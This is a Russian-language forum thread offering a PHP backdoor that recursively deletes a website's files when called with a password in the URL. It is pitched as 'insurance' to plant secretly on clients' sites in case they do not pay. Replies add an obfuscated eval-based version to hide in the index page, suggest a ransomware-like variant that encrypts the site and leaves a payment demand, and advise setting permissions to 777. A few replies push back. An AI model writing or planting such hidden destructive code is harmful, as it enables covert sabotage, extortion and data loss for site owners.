Раздача Скрипт уничтожения сайта.

Конечно надеюсь что такой скрипт никому никогда не понадобится. Но бывают случаи когда не оплатили за сайт, и поменяли пароль (закрыв тебе доступ) и тебя кинули на деньги (не расчитавшись).

Что же тогда делать? Как себя подстраховывать?
Тогда на сайт втихаря нужно кинуть такой скриптик. Скрипт уничтожения сайта.

Код:
http://[сайт]/[путь куда спрятали]/[имя скрипта - стандартный delete].php[параметры]

Если параметры не указать, а просто открыть то увидим корневой путь (относительно корня) «/».
Если запустить с параметром:
Код:
"?del=[пароль]" -- указан пароль в скрипте (стандартный "killbil")
. То мы удалим весь сайт!

В плане безопасности — безопасен, если вы изменили пароль. Так что можно заливать и не бояться. Вот когда оплатят или выполнят требования, и уже станет не актуален, можно будет и удалить.
Если же нужно определенную папку удалить то параметр будет выглядеть так:
Код:
"?del=[пароль]&path=[путь]"
Если вы сомневаетесь что путь корректен по ссылке, то можно отправить для теста так:
"?path=[путь]"

И он в браузере покажет вам путь что вы ему отправили.

Вот код:
Код:
// чтобы точно выполнился
ignore_user_abort(true);
set_time_limit(0);
// стандартный путь
$path=$_SERVER['DOCUMENT_ROOT'];
// стандартный пароль (меняем на свой)
$pass="killbil";
// можем и отправить что именно удалить (папку)
if (isset($_GET['path']))
$path=$_GET['path'];
// реальный путь
echo $path=realpath($path);
// если получим параметр на удаление и он будет корректен
if ((isset($_GET['del']))&&($_GET['del']==$pass))
rmdir_recurse($path);
// рекурсионное удаление
function rmdir_recurse($path) {
$path = rtrim($path, '/').'/';
$handle = opendir($path);
while(false !== ($file = readdir($handle))) {
if($file != '.' and $file != '..' ) {
$fullpath = $path.$file;
if(is_dir($fullpath)) rmdir_recurse($fullpath); else unlink($fullpath);
}
}
closedir($handle);
rmdir($path);
}

Скачать:
http://chizi.by/?dl_id=137
 

А как его активировать-то? надо ставить скрипт отдельно на хостинг, чтобы он заработал? Объясните нубасам
Это страховка! заранее закинуть в структуру сайта,т.е в каталог. перед продажей!
 

Рекламное сообщение
24xbtc.com – сервис по обмену криптовалют №1 для тех, кому надоело терять деньги на невыгодных обменах, переживать за свою анонимность и безопасность, а также полноту резервов.

Мы гарантируем:
  • сотни направлений обмена;
  • зачисление денег на карты большинства банков;
  • качественную техническую поддержку;
  • дополнительные преимущества для каждого клиента.
Просто наслаждайтесь быстрым и выгодным обменом, а все проблемы предоставьте нам.

➡️ Перейти к обмену
 

А как его активировать-то? надо ставить скрипт отдельно на хостинг, чтобы он заработал? Объясните нубасам
Есть строка get запроса для вызова
PHP:
if ((isset($_GET['del']))&&($_GET['del']==$pass))
Это нужно вызывать в самом скрипте запрос типа http://сайт.ёк/script.php?del=pass
Но это не есть выход такую структуру можно выявить если мало мальски понимать php
я свои программы защищаю бесконечным циклом который просто отправляет комп в нирвану, но в программе проще можно всё спрятать в библиотеку, но такой же принцип и на php можно реализовать если захотеть вызов так же можно осуществить через get, найти функцию будет по сложнее так как много чего в цикле работает.
 

Есть строка get запроса для вызова
PHP:
if ((isset($_GET['del']))&&($_GET['del']==$pass))
Это нужно вызывать в самом скрипте запрос типа http://сайт.ёк/script.php?del=pass
Но это не есть выход такую структуру можно выявить если мало мальски понимать php
я свои программы защищаю бесконечным циклом который просто отправляет комп в нирвану, но в программе проще можно всё спрятать в библиотеку, но такой же принцип и на php можно реализовать если захотеть вызов так же можно осуществить через get, найти функцию будет по сложнее так как много чего в цикле работает.
Можно обфусцировать весь код скрипта
Получится что-то вроде этого
PHP:
<?php $J4132D9732FB359677AF51544D51A40A4="eNptkcuWojAURX8pRKguBz0QISiaqwl5QGY8XE2RgLRFK/L1Tc97cNYdnDs4a+/r4n9eN+G93u9sZknIhUSssx6NOGGIIbrsEI3jN8jC5xb2IEhIUYyvWerEQHSJU0T77QeTZK8i92KO02poiUITYR5JdTJ9c49hIbePTLQ+158BJEGnE4RvPfQlatrafvrKelZn2y/YKJWJ3aaKmv7shREXa/B0FN5uAT0rg9QstEq1bjK5IXewhMk8TbMcON1vZ6Pap1JjyZNRXOQIVBnGl+YtCeSCpKVCKKiw18qNOV6EQ6afjYzHB/Sz1XHhZc5FNzv/KVR617l6sqHG2vFJ9ORb9O3p7EFxiZqpyMe+ShSTC1Cdu1elYWZoLGs1fpRx4POOPIyDooy3+YXc/VKafeNAVqrNMuuRWvAC4taanJ8LufUFTl31r3cGZQPPaAKo7P1A2SZhjkyNHolJUivtnDO5etD1Qwyg+OAGaUdR28Y7LS2iyH0LlD45Ds7m0E4y57OW5DeNCsw25LcRpDRd41fk+CqWsG2S9H07ACpk/K4O4V2LxkplrnzgBvDkagVTOYQzj2BfkfTEe/qq+3tgkuBV6DkQiL2pCwfumheNyPuSpweO3bqbLDfnFhXLZeW16I6UF1I/mqjenLHJYFgvGlOO+WPlf6rwWJZoHlZ/51LGm3Ih5zr59T6jebypBtbdudEM3+LRUzaQpTVMOO5TPGPp2MPEY08X+FgZ42wJSXZwA/V2Xt1RXx6a8RL/ehhtiktiKHxNwwltk9rx7thNrlndnpK0rbHEQLbWaHiaRN7NZvSqHp5VHr5NDsv/ftJ4DJmUHsTHAMQOcQkxRPQFURjSTiWX2ESskzMTEMKXHU+Z/XFd/J9/ASTlJyg=";eval(base64_decode(gzuncompress(base64_decode($J4132D9732FB359677AF51544D51A40A4))));?>
Если сайт на php, то этот участок кода вставить в индексную страницу сайта
Далее, в "День Х" обратиться к главной странице сайта с нужным ключем (get запросом)

P.S. От продвинутых прогеров php это вряд ли спасет...но это еще не точно):D
 

Конечно надеюсь что такой скрипт никому никогда не понадобится. Но бывают случаи когда не оплатили за сайт, и поменяли пароль (закрыв тебе доступ) и тебя кинули на деньги (не расчитавшись).

Подкину идейку: скрипт по шифрованию директории, т.е. при запуске с параметром "?encode=[пароль]" упаковываем в тар архив, далее его шифруем, создаем файл в корневой папке index.html с текстом "какой плохой человек, не отдал нам денег". Ну и при возвращении денег, отправляем пароль от архива нехорошему человеку
 

Можно пример запроса, у меня что то скрипт не срабатывает на локалке.
Допустим у меня сайт mysite.ru и файл delete лежит в корне.
Запрос должен быть такого вида?
http://mysite.ru/delete.php?del=killbil
я правильно понял?
 

Можно пример запроса, у меня что то скрипт не срабатывает на локалке.
Допустим у меня сайт mysite.ru и файл delete лежит в корне.
Запрос должен быть такого вида?
http://mysite.ru/delete.php?del=killbil
я правильно понял?

возможно права на файл нужно поставить 777
 

У любого приличного хостера ведутся резервные копии - так что это во-первых не поможет, во-вторых не портите себе карму вредительством.
А плохишей сама жизнь накажет!
 

Так работайте с предоплатой и не будет проблем.
Ну взяли вы 50% предоплаты, сделали сайт на хостинге заказчика. Заказчик поменял пароли и сказал досвидос. Ваши действия?
 


Полезный скрипт однако, всем кто продает сайты, занимается разработкой для клиентов, пользуйтесь! ))
Сейчас как раз у меня такая ситуация, клиенту перевожу сайта, а предоплата только 50% была. Будем страховаться))
 

Please note, if you want to make a deal with this user, that it is blocked.
Продавайте через гаранта или биржу и не надо не каких скриптов. Если человек шарящий то не спасет и скрипт,все это лажа.
 

Обратите внимание

Назад
Сверху